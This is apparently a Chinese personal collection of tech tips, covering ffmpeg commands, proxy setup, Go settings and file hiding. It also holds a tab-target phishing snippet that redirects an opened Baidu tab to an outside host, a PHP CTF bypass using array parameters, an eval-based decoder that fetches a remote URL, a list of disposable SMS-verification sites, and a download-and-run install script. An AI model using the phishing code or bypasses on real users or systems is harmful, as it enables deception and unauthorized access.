那些黑科技

远程控制地址栏

http://675ba661.w1n.pw/41593a https://www.leavesongs.com/PENETRATION/use-target-to-spoof-fishing.html
<html>
<head><meta charset="utf-8"></head>
<body>
<a href="https://www.baidu.com" target="baidu" id="baidu" onclick="return start()">click me</a>

<script>
function start() {
    setInterval(function() {
        baidu.href="http://675ba661.w1n.pw/baidu";
        baidu.click();
    }, 10000);
}
</script>
</body>
</html>
<html>
<head><meta charset="utf-8"></head>
<body>
<a href="javascript:;" onclick="return start()">click me</a>

<script>
function start() {
    var w = window.open('https://www.baidu.com', 'baidu');
    setInterval(function() {
        w.location = 'http://675ba661.w1n.pw/baidu'
    }, 5000)
}
</script>
</body>
</html>

PHP浮点精确度

https://www.itcodemonkey.com/article/2185.html
floor((0.1+0.7)*10) 通常会返回 7 而不是预期中的 8，因为该结果内部的表示其实是类似 7.9999999999999991118…。
?year=2016.99999999999 输出2017
var_dump("0e123" == "0e456");  //true
var_dump("0e123" == "0eabc");  //flase
0e123与0e456相互不严格性质比较的时候，会将0e这类字符串识为科学技术法的数字,0的无论多少次方都是零，所以相等,输出 true

0e123与0eabc相互进行不严格性质比较的时候，本应该将0e这类字符串识为科学技术法的数字,但是这里的0e后面跟着的是abc,数学中科学计数的指数不可以包含字母。所以这里字符串中虽然是0e开头，但是后面的abc却不符合科学技法的规范，所以输出是 false

error_reporting(0);
$flag = 'flag{I_think_that_I_just_broke_md5}';
if (isset($_GET['username']) and isset($_GET['password'])) {
    if ($_GET['username'] == $_GET['password'])
        print 'Your password can not be your username.';
    else if (md5($_GET['username']) === sha1($_GET['password']))
        die($flag);
    else
        print 'Invalid password';
}
if ($_GET['username'] == $_GET['password'])
并且得满足:
if (md5($_GET['username']) === sha1($_GET['password']))  ?username[]=a&password[]=b

隐藏文件

把hosts文件系统文件自动保护并隐藏的方法：

运行WIN+R，cmd，启动命令行以后，输入命令 ATTRIB +S +H +R HOSTS

还原为普通文件允许修改：

运行WIN+R，cmd，启动命令行以后，输入命令 ATTRIB -S -H -R HOSTS
https://blog.gxxsite.com/hostswen-jian-bao-hu-jia-suo-yu-jie-suo-kuai-su-pei-zhi-ke-shang-github-google/

编码

$cipher = "XHg2OFx4NzRceDc0XHg3MFx4NzNceDNhXHgyZlx4MmZceDc0XHg2NVx4NzJceDZkXHg2Mlx4NjlceDZlXHgyZVx4NjNceDZmXHg2ZFx4MmZceDZjXHg2Y1x4NjJceDYz";

// 1. base64
$escaped_hex = base64_decode($cipher);
echo 'escaped_hex: ' . $escaped_hex . PHP_EOL;

// 2. "\x" unescape https://learnku.com/articles/25862
eval('$url = "' . $escaped_hex . '";');
echo 'url: ' . $url . PHP_EOL;

// 3. read this url
$resource = trim(
    file_get_contents($url)
);
echo 'resource: ' . $resource . PHP_EOL;

// 4. trim
$encoding = strstr($resource, ':', true);
echo 'encoding: ' . $encoding . PHP_EOL;

// 5. absorb real data
$parts = explode(' ', $resource);
array_shift($parts);
$hex = implode('', $parts);
echo 'hex: ' . $hex . PHP_EOL;

// 6. get the raw binary
$bin = pack('H*', $hex);

// 7. final convert
$results = mb_convert_encoding($bin, 'utf-8', $encoding);
echo 'RESULTS: ' . $results . PHP_EOL;

命令行进度条

<?php
    echo "\033[41:37m \n Laravel ERROR : Oh My God, this is a bug!!! \n https://kuricat.com/gist/ansi-stdout-6s4pi";
$count = 100;
for ($i = 1; $i <= 100; $i++) {
    usleep(50000);
    $color = $i % 8 + 40;
    $equalStr = str_repeat("\033[{$color};37m=\33[0m", $i);
    $space    = str_repeat(" ", $count - $i);
    echo("\r [$equalStr>$space]($i/$count%)");
}

cookie编辑

document.cookie="username=John Doe; expires=Thu, 18 Dec 2013 12:00:00 UTC; path=/"; 
也可以删除cookie 
https://chrome.google.com/webstore/detail/editthiscookie/fngmhnnpilhplaeedifhccceomclgfbg
https://superuser.com/questions/244062/how-do-i-view-add-or-edit-cookies-in-google-chrome

国内外免费可用接收短信验证码平台网站

https://www.09l.me/714.html
免费接收短信	http://www.shejiinn.com/	中国、缅甸
Z-SMS	http://z-sms.com/	中国、美国、缅甸、爱沙尼亚
免费接收短信	http://www.smszk.com/	中国
在线接收短信	https://www.becmd.com/	美国、中国
在线短信接收	https://www.pdflibr.com/	美国、中国、菲律宾
MyTrashmobile	https://zh.mytrashmobile.com/	美国、英国、加拿大
FreePhonenum	https://ch.freephonenum.com/	美国、加拿大(支持免费发短信)
ReceiveSMS	https://www.receivesms.co/	奥地利、比利时、加拿大、瑞士、丹麦、西班牙、英国、意大利、拉脱维亚、波兰、葡萄牙、瑞典、美国
Receive SMS	http://receivesmsverification.com/	比利时、英国、美国
Receive Online SMS	http://receiveonlinesms.biz/	美国、瑞典、挪威、西班牙、英国
Receive Free SMS	http://www.freesmsverifications.com/	美国、英国、法国、波兰、比利时、加拿大
SMS-Receive	https://sms-receive.net/	俄罗斯、法国、罗马尼亚、西班牙、荷兰、英国
Receive-SMS-Now	http://www.receive-sms-now.com/	美国、加拿大、荷兰
Receive SMS Online	http://receivesmsonline.in/	美国、加拿大、西班牙
Receive-SMS-Now	http://receivefreesms.net/	美国、加拿大、西班牙
SMSReceiveFree	https://smsreceivefree.com	美国、英国、加拿大
Receive SMS Online for FREE	https://www.receive-sms-online.info/	英国、罗马尼亚、美国、西班牙、法国、德国、俄罗斯
Receive a SMS Online	https://receive-a-sms.com/	美国、澳大利亚、挪威、奥地利、巴西、香港、南非、波兰、英国、加拿大
Free SMS Numbers Online	https://smsnumbersonline.com/	美国、英国、加拿大、波兰
Receive SMS online for Free	https://sms-online.co/receive-free-sms	美国、英国、加拿大、瑞典、法国、马来西亚、印度尼西亚
Receive-SMS	https://receive-sms.com/	美国
Receive FREE SMS online	http://receivefreesms.com/	美国、英国、挪威、瑞典、荷兰、澳大利亚、匈牙利、立陶宛、香港等
RECEIVE SMS ONLINE	https://www.receivesmsonline.net/	美国、加拿大、英国
Free Online Phone	https://www.freeonlinephone.org	美国、加拿大、英国、瑞典
Receive SMS Online	http://receive-sms-online.com	俄国、英国、乌克兰
TextNow	https://www.textnow.com/	美国
Textfree	https://www.pinger.com/text-free/	
SELLAITE	http://sms.sellaite.com/	爱沙尼亚
Twilio	https://www.twilio.com/	支持API调用，看上去很不错

隐藏文件夹

1
2
3

在命令提示符下输入：attrib +s +a +h +r d:不告诉你，回车，就彻底隐藏了D:\不告诉你文件夹了，即使在显示隐藏的文件、文件夹和驱动器下也可以将其隐藏起来。
直接在地址栏输文件夹名不告诉你即可打开文件夹，神不知鬼不觉
需要在命令提示符下输入：attrib -s -a -h -r d:不告诉你，回车，此时不告诉你文件夹就显示出来了。

ffmpeg

ffmpeg.exe
ffmpeg是用于转码的应用程序。
一个简单的转码命令可以这样写：
将input.avi转码成output.ts，并设置视频的码率为640kbps
ffmpeg -i input.avi -b:v 640k output.ts
ffplay.exe
ffplay是用于播放的应用程序。
一个简单的播放命令可以这样写：
# 播放test.avi
ffplay test.avi

# 将视频流下载并合并成 out.mkv 
ffmpeg -i http://...m3u8 -c copy out.mkv
ffmpeg 的一些参数
基本使用方式：
ffmpeg [[options][`-i’ input_file]] {[options] output_file} 
a) 通用选项
ffmpeg -h 帮助，查看所有参数说明
-i filename 输入文件 
-b bitrate 设置比特率，缺省200kb/s 
-ss position 搜索到指定的时间 [-]hh:mm:ss[.xxx]的格式也支持。使用-ss参数的作用，可以从指定时间点开始转换任务，-ss后的时间单位为秒 
-title string 设置标题（比如PSP中显示影片的标题） 
-author string 设置作者 
-r fps 设置帧频 缺省25 
-s size 设置帧大小 格式为W*H 缺省160*128.也可以直接使用简写
-ab bitrate 设置音频码率 
-ar freq 设置音频采样率 
ffmepg常用的方法
1.提取音频
ffmpeg -i test.mp4 -acodec copy -vn output.aac 

# 上面的命令，默认mp4的audio codec是aac,如果不是，可以都转为最常见的aac。 
ffmpeg -i test.mp4 -acodec aac -vn output.aac
2.视频剪切
# 下面的命令，可以从时间为00:00:15开始，截取5秒钟的视频。 
ffmpeg -ss 00:00:15 -t 00:00:05 -i input.mp4 -vcodec copy -acodec copy output.mp4 
# -ss表示开始切割的时间，-t表示要切多少。上面就是从15秒开始，切5秒钟出来。
3.码率控制
码率控制对于在线视频比较重要。因为在线视频需要考虑其能提供的带宽。
那么，什么是码率？很简单：
bitrate = file size / duration 比如一个文件20.8M，时长1分钟，那么，码率就是： biterate = 20.8M bit/60s = 20.810241024*8 bit/60s= 2831Kbps 一般音频的码率只有固定几种，比如是128Kbps， 那么，video的就是 video biterate = 2831Kbps -128Kbps = 2703Kbps
那么ffmpeg如何控制码率？
ffmpg控制码率有3种选择，-minrate -b:v -maxrate
-b:v主要是控制平均码率。 比如一个视频源的码率太高了，有10Mbps，文件太大，想把文件弄小一点，但是又不破坏分辨率。
ffmpeg -i input.mp4 -b:v 2000k output.mp4 
上面把码率从原码率转成2Mbps码率，这样其实也间接让文件变小了。目测接近一半。 不过，ffmpeg官方wiki比较建议，设置b:v时，同时加上 -bufsize。
-bufsize 用于设置码率控制缓冲器的大小，设置的好处是，让整体的码率更趋近于希望的值，减少波动。（简单来说，比如1 2的平均值是1.5， 1.49 1.51 也是1.5, 当然是第二种比较好）
ffmpeg -i input.mp4 -b:v 2000k -bufsize 2000k output.mp4
-minrate 就简单了，在线视频有时候，希望码率波动，不要超过一个阈值，可以设置maxrate。
ffmpeg -i input.mp4 -b:v 2000k -bufsize 2000k -maxrate 2500k output.mp4
4.视频编码格式转换
比如一个视频的编码是MPEG4，想用H264编码，咋办？
ffmpeg -i input.mp4 -vcodec h264 output.mp4 
# 相反也一样 
ffmpeg -i input.mp4 -vcodec mpeg4 output.mp4
5.视频压缩
将输入的1920x1080缩小到960x540输出:
ffmpeg -i input.mp4 -vf scale=960:540 output.mp4 
# ps: 如果540不写，写成-1，即scale=960:-1, 那也是可以的，ffmpeg会通知缩放滤镜在输出时保持原始的宽高比。
6.为视频添加logo
想要贴到一个视频上，那可以用如下命令：
./ffmpeg -i input.mp4 -i iQIYI_logo.png -filter_complex overlay output.mp4 
结果如下所示： 001.jpg

要贴到其他地方？看下面：
右上角： 
./ffmpeg -i input.mp4 -i logo.png -filter_complex overlay=W-w output.mp4 
左下角： 
./ffmpeg -i input.mp4 -i logo.png -filter_complex overlay=0:H-h output.mp4 
右下角： 
./ffmpeg -i input.mp4 -i logo.png -filter_complex overlay=W-w:H-h output.mp4
7.去掉视频的logo
语法：
-vf delogo=x:y:w:h[:t[:show]] 
x:y 离左上角的坐标 
w:h logo的宽和高 
t: 矩形边缘的厚度默认值4 
show：若设置为1有一个绿色的矩形，默认值0。
ffmpeg -i input.mp4 -vf delogo=0:0:220:90:100:1 output.mp4 
结果如下所示： 002.jpg

8.截取视频图像
ffmpeg -i input.mp4 -r 1 -q:v 2 -f image2 pic-%03d.jpeg 
# -r 表示每一秒几帧 
# -q:v表示存储jpeg的图像质量，一般2是高质量。 
如此，ffmpeg会把input.mp4，每隔一秒，存一张图片下来。假设有60s，那会有60张。
可以设置开始的时间，和你想要截取的时间。
ffmpeg -i input.mp4 -ss 00:00:20 -t 10 -r 1 -q:v 2 -f image2 pic-%03d.jpeg 
# -ss 表示开始时间 
# -t 表示共要多少时间。 
如此，ffmpeg会从input.mp4的第20s时间开始，往下10s，即20~30s这10秒钟之间，每隔1s就抓一帧，总共会抓10帧。
干货：多个视频文件或文本文档合并成一个文件
001.png 在当前目录下建立一个文本文挡，内容
copy /b 1.ts + 2.ts + 3.ts new.ts
然后保存，将文本文档后缀改成bat格式。打开即可将目录下的ts文件以二进制顺序合并为new.ts文件。 002.png

txt文本同样也可以用这种方法合并
http://www.golang365.com/#/blog/20

命令行科学上网实践

apt-get install xxxx
listen-address 0.0.0.0:8118
forward-socks5 / localhost:1086 .
sudo privoxy /usr/local/etc/privoxy/config
netstat -an | grep 8118
# 效果如下
# tcp4     0    0  127.0.0.1.8118     *.*    LISTEN
# tcp4     0    0  *.8118             *.*    LISTEN
ps -ef | grep privoxy
proxy_on
https://sanbaofengs.com/2018/06/25/command-line-proxy/

网易云音乐歌曲变灰

git clone https://github.com/nondanee/UnblockNeteaseMusic.git #克隆项目仓库
cd UnblockNeteaseMusic #进入项目根目录
host 里面加入

127.0.0.1 music.163.com
127.0.0.1 interface.music.163.com
node app.js -p 80 -f 223.252.199.66
重启网易云 https://learnku.com/laravel/t/32900

如何预览GitHub项目里面的网页

访问根目录demo.html http://xxx.github.io/DEMOs/demo.html
在github上demo的仓库页面，点击“setting”按钮；

找到GitHub Pages版块，选择Source为“master branch”，然后保存

http://htmlpreview.github.io/
http://rawgit.com/

一键反代谷歌和谷歌学术

https://v2ex.com/t/247719#reply55 

 
1. wget -N --no-check-certificate https://raw.githubusercontent.com/sakz/ngx_google_deployment/master/install.sh
2. chmod 771 ./install.sh
3. bash ./install.sh
https://blog.fazero.me/2016/01/19/ngx-google/

proxychains在终端使用socks5代理

git clone https://github.com/rofl0r/proxychains-ng.git
cd proxychains-ng
./configure
make && make install
cp ./src/proxychains.conf /etc/proxychains.conf
cd .. && rm -rf proxychains-ng
vim /etc/proxychains.conf

socks5 127.0.0.1 1080
需要代理的命令前加上 proxychains4 ，如：

proxychains4 wget http://xxx.com/xxx.zip
https://blog.fazero.me/2015/08/31/%E5%88%A9%E7%94%A8proxychains%E5%9C%A8%E7%BB%88%E7%AB%AF%E4%BD%BF%E7%94%A8socks5%E4%BB%A3%E7%90%86/

免费获取歌词

http://geci.me/api/lyric/海阔天空  
http://geci.me/api/lyric/海阔天空/Beyond
http://geci.me/api/cover/1573814 根据专辑编号获取专辑封面URL

https://hacpai.com/article/1364440883834

Deepin 系统科学上网 PAC 自动代理

pip3 install genpac
genpac --pac-compress --pac-proxy 'SOCKS5 127.0.0.1:1080' --format pac  -o ~/auto.pac
设置系统代理，设置 > 网络 > 系统代理 > 自动

配置 URL：

file:///home/登录用户名/auto.pac
https://gleehub.com/tool/deepin-xi-tong-ke-xue-shang-wang-pac-zi-dong-dai-li.html

环境变量

$ export GOPROXY=https://goproxy.cn
$ echo "export GOPROXY=https://goproxy.cn" >> ~/.profile && source ~/.profile
打开你的 PowerShell 并执行：

C:\> $env:GOPROXY = "https://goproxy.cn"
或者

1. 打开“开始”并搜索“env”
2. 选择“编辑系统环境变量”
3. 点击“环境变量…”按钮
4. 在“<你的用户名> 的用户变量”章节下（上半部分）
5. 点击“新建…”按钮
6. 选择“变量名”输入框并输入“GOPROXY”
7. 选择“变量值”输入框并输入“https://goproxy.cn”
8. 点击“确定”按钮

https://learnku.com/articles/37926